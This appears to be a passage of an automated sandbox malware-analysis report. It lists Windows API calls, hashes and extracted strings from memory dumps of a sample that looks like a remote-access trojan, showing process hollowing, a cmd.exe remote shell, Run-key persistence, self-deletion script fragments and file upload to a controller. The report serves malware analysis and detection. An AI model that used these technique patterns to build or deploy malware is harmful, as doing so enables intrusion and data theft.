                                                  • Instruction ID: 5c4607475d29a5c6e075c7c82c4f8611bfe12285e7985907a5f7e010b8524765
                                                  • Opcode Fuzzy Hash: 86e38cefe18f60a5317b990390b8ef0f53fe4f457a10542f643d98f04a2d82c8
                                                  • Instruction Fuzzy Hash: 19C17C71148344AFD3209F64DC84B6BBBE9FF88751F05482DF989972A1DB70E904CB66
                                                  APIs
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 021075D3
                                                  • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 021075EB
                                                  • GetThreadContext.KERNEL32(?,00000000), ref: 02107601
                                                  • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 02107627
                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 021076A7
                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 021076BB
                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 021076F2
                                                  • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 021077BF
                                                  • SetThreadContext.KERNEL32(?,00000000), ref: 021077DC
                                                  • ResumeThread.KERNEL32(?), ref: 021077E9
                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 02107801
                                                  • GetCurrentProcess.KERNEL32(?), ref: 0210780C
                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 02107826
                                                  • GetLastError.KERNEL32 ref: 0210782E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                  • String ID: `#v$ntdll
                                                  • API String ID: 3275803005-3287463391
                                                  • Opcode ID: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                  • Instruction ID: 935999ac1300324be76aff1fd6ade7da2c860f208d99e39b82333f0726da7cf3
                                                  • Opcode Fuzzy Hash: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                  • Instruction Fuzzy Hash: 76A16C71544304AFD7209F65DC88B6BBBE8FF48349F00482AF689C61A1E7B5E445CF69
                                                  APIs
                                                  • lstrlenW.KERNEL32(?), ref: 0041B1D6
                                                  • _memcmp.LIBVCRUNTIME ref: 0041B1EE
                                                  • lstrlenW.KERNEL32(?), ref: 0041B207
                                                  • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B242
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B255
                                                  • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B299
                                                  • lstrcmpW.KERNEL32(?,?), ref: 0041B2B4
                                                  • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2CC
                                                  • _wcslen.LIBCMT ref: 0041B2DB
                                                  • FindVolumeClose.KERNEL32(?), ref: 0041B2FB
                                                  • GetLastError.KERNEL32 ref: 0041B313
                                                  • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B340
                                                  • lstrcatW.KERNEL32(?,?), ref: 0041B359
                                                  • lstrcpyW.KERNEL32(?,?), ref: 0041B368
                                                  • GetLastError.KERNEL32 ref: 0041B370
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                  • String ID: ?
                                                  • API String ID: 3941738427-1684325040
                                                  • Opcode ID: d489e3e95fd4da7a256b353d04e65c95c699bf3c253225e66008eb700c534145
                                                  • Instruction ID: 2e0df54dd889987763cd5022c3700ac4418931210c184d5857636408485aa128
                                                  • Opcode Fuzzy Hash: d489e3e95fd4da7a256b353d04e65c95c699bf3c253225e66008eb700c534145
                                                  • Instruction Fuzzy Hash: 8B416F71508305AAD7209FA1EC8C9EBB7E8EB49715F00096BF541C2261EB78C98887D6
                                                  APIs
                                                  • lstrlenW.KERNEL32(?), ref: 0210B43D
                                                  • _memcmp.LIBVCRUNTIME ref: 0210B455
                                                  • lstrlenW.KERNEL32(?), ref: 0210B46E
                                                  • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0210B4A9
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0210B4BC
                                                  • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0210B500
                                                  • lstrcmpW.KERNEL32(?,?), ref: 0210B51B
                                                  • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0210B533
                                                  • _wcslen.LIBCMT ref: 0210B542
                                                  • FindVolumeClose.KERNEL32(?), ref: 0210B562
                                                  • GetLastError.KERNEL32 ref: 0210B57A
                                                  • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0210B5A7
                                                  • lstrcatW.KERNEL32(?,?), ref: 0210B5C0
                                                  • lstrcpyW.KERNEL32(?,?), ref: 0210B5CF
                                                  • GetLastError.KERNEL32 ref: 0210B5D7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                  • String ID: ?
                                                  • API String ID: 3941738427-1684325040
                                                  • Opcode ID: d489e3e95fd4da7a256b353d04e65c95c699bf3c253225e66008eb700c534145
                                                  • Instruction ID: 8cd8fe1ee96de213e95c0b97d1fea79a96aba6d4380a29f9e106d25c4d35608d
                                                  • Opcode Fuzzy Hash: d489e3e95fd4da7a256b353d04e65c95c699bf3c253225e66008eb700c534145
                                                  • Instruction Fuzzy Hash: 6541407154C305ABD720DF64EC88AAF77E8AB48719F00097AF545D21A1EBB4D748CB92
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$EnvironmentVariable$___from_strstr_to_strchr_wcschr
                                                  • String ID:
                                                  • API String ID: 2719235668-0
                                                  • Opcode ID: 8f41269c20bd7867c5cee3d16b4b1ea97dee87ff38f7f4f352333e12906372dc
                                                  • Instruction ID: d2f13b8399f778681e9a612c8e66c832f4936b1a63310b6f079f495aa7c693e4
                                                  • Opcode Fuzzy Hash: 8f41269c20bd7867c5cee3d16b4b1ea97dee87ff38f7f4f352333e12906372dc
                                                  • Instruction Fuzzy Hash: C0D14B72D80304BFDB27AF789884B6A7BABAF05324F05417DE945A7280E7329941CFD5
                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 020F52F5
                                                    • Part of subcall function 02123736: RtlEnterCriticalSection.NTDLL(00470D18), ref: 02123740
                                                    • Part of subcall function 02123736: RtlLeaveCriticalSection.NTDLL(00470D18), ref: 02123773
                                                    • Part of subcall function 020F46CF: send.WS2_32(?,00000000,00000000,00000000), ref: 020F4764
                                                  • __Init_thread_footer.LIBCMT ref: 020F5332
                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 020F544E
                                                    • Part of subcall function 02123780: RtlEnterCriticalSection.NTDLL(00470D18), ref: 0212378B
                                                    • Part of subcall function 02123780: RtlLeaveCriticalSection.NTDLL(00470D18), ref: 021237C8
                                                  • Sleep.KERNEL32(0000012C,00000093,?), ref: 020F54A6
                                                  • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 020F54CB
                                                  • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 020F54F8
                                                    • Part of subcall function 02123B0C: __onexit.LIBCMT ref: 02123B12
                                                  • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 020F55F5
                                                  • Sleep.KERNEL32(00000064,00000062,00465554), ref: 020F560F
                                                  • TerminateProcess.KERNEL32(00000000), ref: 020F5628
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterFileInit_thread_footerLeaveProcessSleep$CreateNamedPeekPipeReadTerminateWrite__onexitsend
                                                  • String ID: P\G$P\G$P\G$P\G$P\G$cmd.exe
                                                  • API String ID: 121539554-3292008770
                                                  • Opcode ID: 797804256bd83e4a27056d5b7dd8b844625091c3a01af072158c3512f2156987
                                                  • Instruction ID: 329fd7c98cf14d28f9836544d88f7c73a74701cc4bb3ca563d7f980b10aeaf50
                                                  • Opcode Fuzzy Hash: 797804256bd83e4a27056d5b7dd8b844625091c3a01af072158c3512f2156987
                                                  • Instruction Fuzzy Hash: 55910B716807046FD752BB24ED40F6E3B9AEB40344F804039FB19AF5A1EF649C44AF69
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$EnvironmentVariable$_wcschr
                                                  • String ID:
                                                  • API String ID: 3899193279-0
                                                  • Opcode ID: 8f41269c20bd7867c5cee3d16b4b1ea97dee87ff38f7f4f352333e12906372dc
                                                  • Instruction ID: 8ac3cd9939a067627e1c481289c57a7f9f94b657261427fab31af25724b0c78e
                                                  • Opcode Fuzzy Hash: 8f41269c20bd7867c5cee3d16b4b1ea97dee87ff38f7f4f352333e12906372dc
                                                  • Instruction Fuzzy Hash: 96D13C719007007FFB25AF7B9881A6F7BA4BF02314F0541AFF905A7381E63989418B9D
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                    • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB5F
                                                    • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                    • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                  • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                                  • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                                  • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                                  • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                                  • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                  • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                  • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                  • Sleep.KERNEL32(00000064), ref: 00412060
                                                    • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                  • String ID: /stext "$HDG$HDG$>G$>G
                                                  • API String ID: 1223786279-3931108886
                                                  • Opcode ID: 95c3da4ebe13c7bf2eea07050c7786c9c599f6c5c587c2468da1972eb038052f
                                                  • Instruction ID: 1febf249a593eb43810efab42e14b6693ac358e03ba90545e56d33427da79e18
                                                  • Opcode Fuzzy Hash: 95c3da4ebe13c7bf2eea07050c7786c9c599f6c5c587c2468da1972eb038052f
                                                  • Instruction Fuzzy Hash: 960243315083414AC325FB61D891AEFB7D5AFD4308F50493FF88A931E2EF785A49C69A
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                  • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                  • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                  • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                  • API String ID: 2490988753-744132762
                                                  • Opcode ID: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                  • Instruction ID: a4547f3d416e9253f7b1cbdd0907a67efdadb69b2b53743d1710677937ed8fa2
                                                  • Opcode Fuzzy Hash: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                  • Instruction Fuzzy Hash: 6D31C4B1906315A7D320AF25DC44ACBB7ECEF44745F400A2AF844D3201D778DA858AEE
                                                  APIs
                                                    • Part of subcall function 02101900: TerminateProcess.KERNEL32(00000000,?,020FC8E4), ref: 02101910
                                                    • Part of subcall function 02101900: WaitForSingleObject.KERNEL32(000000FF,?,020FC8E4), ref: 02101923
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 020FC27A
                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 020FC28D
                                                    • Part of subcall function 0210AD9F: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,020F3CA7), ref: 0210ADC6
                                                  • ShellExecuteW.SHELL32(00000000,0046559C,00000000,00465900,00465900,00000000), ref: 020FC4E7
                                                  • ExitProcess.KERNEL32 ref: 020FC4EE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CurrentDeleteExecuteExitFileModuleNameObjectShellSingleTerminateWait
                                                  • String ID: @CG$On Error Resume Next$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$`=G$exepath$fso.DeleteFolder "$pth_unenc$while fso.FileExists("
                                                  • API String ID: 508158800-1730539264
                                                  • Opcode ID: a33fc09c9556ef91ef2cee6c22be68f1294df09e9ea1a498d22c8dae3f6f7800
                                                  • Instruction ID: eb6110731211debb429c001c255b8628a5824efd98826135799a3b3909f86a65
                                                  • Opcode Fuzzy Hash: a33fc09c9556ef91ef2cee6c22be68f1294df09e9ea1a498d22c8dae3f6f7800
                                                  • Instruction Fuzzy Hash: 5D81B3322843405FD7A9FB20D860EEF73AAAF90700F10443EFA46579D5EF64AD09DA56
                                                  APIs
                                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B846
                                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B88A
                                                  • RegCloseKey.ADVAPI32(?), ref: 0041BB54
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEnumOpen
                                                  • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                  • API String ID: 1332880857-3714951968
                                                  • Opcode ID: c129c5d3b2225b1f8cda05c9a3a6c18510288d4317852ec5d704d9b0c7986d58
                                                  • Instruction ID: 4ca6cd9db44c7b11bab16217f2b7ba144dfc64e74838f3250c32f9e768a6938f
                                                  • Opcode Fuzzy Hash: c129c5d3b2225b1f8cda05c9a3a6c18510288d4317852ec5d704d9b0c7986d58
                                                  • Instruction Fuzzy Hash: 8C812E311082449BD324EB11DC51AEFB7E9FFD4314F10493FB58A921E1EF74AA49CA9A
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$Info
                                                  • String ID:
                                                  • API String ID: 2509303402-0
                                                  • Opcode ID: 4f311dc35998d231116b4ef065710eb7bf66da857f64ae236b680615c36f9f73
                                                  • Instruction ID: 0af7f9009007d8880989bd470fdb3e4a62bb8e65dbd2af1b74ff5c8893cb1db7
                                                  • Opcode Fuzzy Hash: 4f311dc35998d231116b4ef065710eb7bf66da857f64ae236b680615c36f9f73
                                                  • Instruction Fuzzy Hash: D0B18F71900605AFEF11DFA9C881BEEBBF4BF49304F14406EF855B7242DA79A8458B64
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                  • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                  • __aulldiv.LIBCMT ref: 00407FE9
                                                  • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                  • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                  • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                  • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                  • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                  • API String ID: 1884690901-3066803209
                                                  • Opcode ID: ba36baefaf5fe41803c60f426781eece5a4c22298e84113410fa4c32010d96cc
                                                  • Instruction ID: 222450ca6543349723abdfa1177da379b39b5876d7444fbb960ea0ab75079841
                                                  • Opcode Fuzzy Hash: ba36baefaf5fe41803c60f426781eece5a4c22298e84113410fa4c32010d96cc
                                                  • Instruction Fuzzy Hash: DAB191316083409BC214FB25C892AAFB7E5AFD4314F40492EF885632D2EF789945C79B
                                                  APIs
                                                    • Part of subcall function 02101900: TerminateProcess.KERNEL32(00000000,?,020FC8E4), ref: 02101910
                                                    • Part of subcall function 02101900: WaitForSingleObject.KERNEL32(000000FF,?,020FC8E4), ref: 02101923
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 020FC5F2
                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 020FC605
                                                    • Part of subcall function 0210B7F6: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0210B90C,00000000,00000000,?), ref: 0210B835
                                                  • ShellExecuteW.SHELL32(00000000,0046559C,00000000,00465900,00465900,00000000), ref: 020FC899
                                                  • ExitProcess.KERNEL32 ref: 020FC8A5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileProcess$CreateDeleteExecuteExitModuleNameObjectShellSingleTerminateWait
                                                  • String ID: @CG$On Error Resume Next$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$`=G$exepath$fso.DeleteFolder "$while fso.FileExists("
                                                  • API String ID: 1359289687-1885488838
                                                  • Opcode ID: 4a4176d209088168477d8c341ab9c6af581995fbe5fc9bf84f99647e44242b62
                                                  • Instruction ID: 6069886694e7467f6e6499b1cf71edb4147114a91816dbaf5ac0ee75a6604ebf
                                                  • Opcode Fuzzy Hash: 4a4176d209088168477d8c341ab9c6af581995fbe5fc9bf84f99647e44242b62
                                                  • Instruction Fuzzy Hash: 0A91C6322843405FD3A4FB24D860EEF73AB9F90700F10443EEA46579A5EF64AD49DE56
                                                  APIs
                                                  • _wcslen.LIBCMT ref: 020FBEDC
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 020FBEF5
                                                  • _wcslen.LIBCMT ref: 020FBFBB
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 020FC043
                                                  • _wcslen.LIBCMT ref: 020FC09B
                                                  • CloseHandle.KERNEL32 ref: 020FC102
                                                  • ShellExecuteW.SHELL32(00000000,0046559C,00000000,00465900,00465900,00000001), ref: 020FC120
                                                  • ExitProcess.KERNEL32 ref: 020FC137
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _wcslen$CreateDirectory$CloseExecuteExitHandleProcessShell
                                                  • String ID: 6$C:\Users\user\Desktop\yPIOW6yoPi.exe$BG$BG
                                                  • API String ID: 3303048660-2327441383
                                                  • Opcode ID: 0ce300c52b2574979d2682925cabc15749f3fad58451f58e2d3683bc22aef4dd
                                                  • Instruction ID: 08c97c8486e03b3555e7d157962f8add40591530fd6c788c99996e3c709e4c70
                                                  • Opcode Fuzzy Hash: 0ce300c52b2574979d2682925cabc15749f3fad58451f58e2d3683bc22aef4dd
                                                  • Instruction Fuzzy Hash: E65108222843046FD6D8B7349C51FFF379B9F80744F10442EFA0596DD6EF549805EA6A
                                                  APIs
                                                  • Sleep.KERNEL32(00001388), ref: 00409E62
                                                    • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                    • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                    • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                    • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                  • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                  • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                    • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                  • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,00000000,00000000,00000000), ref: 0040A049
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                  • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                  • API String ID: 3795512280-3163867910
                                                  • Opcode ID: 859471ff5ae44976aba126b0bcf56bf0f182264686a8061ac70fe12e31261d66
                                                  • Instruction ID: b7dfc09a395f5416f32c5fe597dbb364f69b6ed32616efff49b152d1c9b912f4
                                                  • Opcode Fuzzy Hash: 859471ff5ae44976aba126b0bcf56bf0f182264686a8061ac70fe12e31261d66
                                                  • Instruction Fuzzy Hash: 30518D716043005ACB05BB72D866ABF769AAFD1309F00053FF886B71E2DF3D9D44869A
                                                  APIs
                                                  • Sleep.KERNEL32(00001388), ref: 020FA0C9
                                                    • Part of subcall function 020F9FFE: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,020FA0D6), ref: 020FA034
                                                    • Part of subcall function 020F9FFE: GetFileSize.KERNEL32(00000000,00000000,?,?,?,020FA0D6), ref: 020FA043
                                                    • Part of subcall function 020F9FFE: Sleep.KERNEL32(00002710,?,?,?,020FA0D6), ref: 020FA070
                                                    • Part of subcall function 020F9FFE: CloseHandle.KERNEL32(00000000,?,?,?,020FA0D6), ref: 020FA077
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 020FA105
                                                  • GetFileAttributesW.KERNEL32(00000000), ref: 020FA116
                                                  • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 020FA12D
                                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 020FA1A7
                                                    • Part of subcall function 0210B881: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,020F3D5A,00465324), ref: 0210B89A
                                                  • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,00000000,00000000,00000000), ref: 020FA2B0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                  • String ID: @CG$@CG$XCG$XCG$xAG$xAG
